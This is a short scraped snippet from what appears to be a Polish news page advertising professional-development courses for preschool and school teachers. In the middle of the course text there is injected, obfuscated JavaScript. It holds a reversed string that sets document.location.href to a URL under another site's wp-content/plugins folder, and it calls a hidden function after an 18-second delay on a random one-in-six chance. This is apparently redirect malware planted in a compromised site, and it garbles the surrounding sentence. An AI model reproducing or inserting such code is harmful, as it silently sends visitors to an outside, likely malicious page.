Site Loader
Aktualności

KURSY DOSKONALĄCE DLA NAUCZYCIELI PRZEDSZKOLI I SZKÓŁ. Kursy realizowane w formie online lub face toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to face w placówkach u Zamawiajacego

Kursy doskonalące dla rad pedagogicznych: Kurs trwa 3 godziny . Koszt – cena negocjowana  . Zgłoszenie…